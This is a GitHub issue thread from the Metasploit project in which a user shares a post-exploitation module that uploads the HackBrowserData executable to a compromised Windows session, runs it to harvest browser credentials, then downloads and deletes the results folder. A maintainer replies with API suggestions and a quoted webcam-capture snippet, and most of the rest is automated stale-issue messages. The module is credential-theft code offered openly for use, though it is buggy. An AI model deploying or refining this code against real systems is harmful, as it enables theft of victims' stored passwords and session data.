Post failed: Errno::EROFS Read-only file system @ rb_sysopen -

[nounouthereal]

Summary

So I'm currently trying to make a post for myself that:

• Upload an exe file (from HackBrowserData)
• Execute the exe file which creates a directory named results
• Download this directory
• Delete the directory

Relevant information

Post code:

class MetasploitModule < Msf::Post
  include Msf::Post::File

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Multi Gather Browsers Credentials with HackBrowserData',
        'Description' => %q{Push a file and execute it.},
        'Author' => 'nounou',
        'License' => MSF_LICENSE,
        'Platform' => ['win', 'unix', 'linux', 'osx'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          'Stability' => ['np'],
          'Reliability' => ['np'],
          'SideEffects' => ['np']
        }
      )
    )

    register_options([

      OptPath.new('LPATH', [false, 'Local file path to upload and execute']),
      OptString.new('RPATH', [false, 'Remote file path on target (default is temporary folder)']),
      OptString.new('FILENAME', [false, 'Name of the executable (default is hbd.exe)']),
    ])
  end

  def run
    $username = session.sys.config.getenvs('USERNAME')['USERNAME']
    $user_env = "c:\\Users\\#{$username}"

    executable = "#{rpath}\\#{filename}"

    print_status($username)
    print_status("Uploading #{lpath} to #{executable}")
    upload_file(executable, lpath)
    results = "#{rpath}\\results"
    cmd_exec(executable)
    session.fs.dir.download('', results)
    dir_rm(results)
  end

  def lpath
    datastore['LPATH'].blank? ? 'uet.exe' : datastore['LPATH']
  end

  def rpath
    datastore['RPATH'].blank? ? + $user_env + '\\AppData\\Local\\Temp' : datastore['RPATH']
  end

  def filename
    datastore['FILENAME'].blank? ? 'hbd.exe' : datastore['FILENAME']
  end
end

[adfoster-r7]

A stacktrace would be useful; but I'm guessing that you would want to use the read_file and store_loot APIs

metasploit-framework/modules/post/osx/manage/webcam.rb

Lines 127 to 130 in 5975d66

	img = read_file(tmp_file + snap_type)
	f = store_loot('OSX Webcam Snapshot', "image/#{snap_type}",
	session, img, "osx_webcam_snapshot.#{snap_type}", 'OSX Webcam Snapshot')
	print_good "Snapshot successfully taken and saved to #{f}"

[nounouthereal]

Is there any MimeType for a windows directory or I have to make a loop to go through each file ?

[adfoster-r7]

I believe you will have to loop through the folder's contents

[github-actions]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[abhinandponnu2008]

I need to reopen the issue

…

On Thu, 11 Apr, 2024, 8:33 pm github-actions[bot], ***@***.***> wrote: Hi again! It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else. As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request. — Reply to this email directly, view it on GitHub <#18789 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/A65MYFRHXCQKNNKLBGWPIG3Y42Q3HAVCNFSM6AAAAABC2XZR7GVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDANBZHA4TONBWHE> . You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>

[github-actions]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.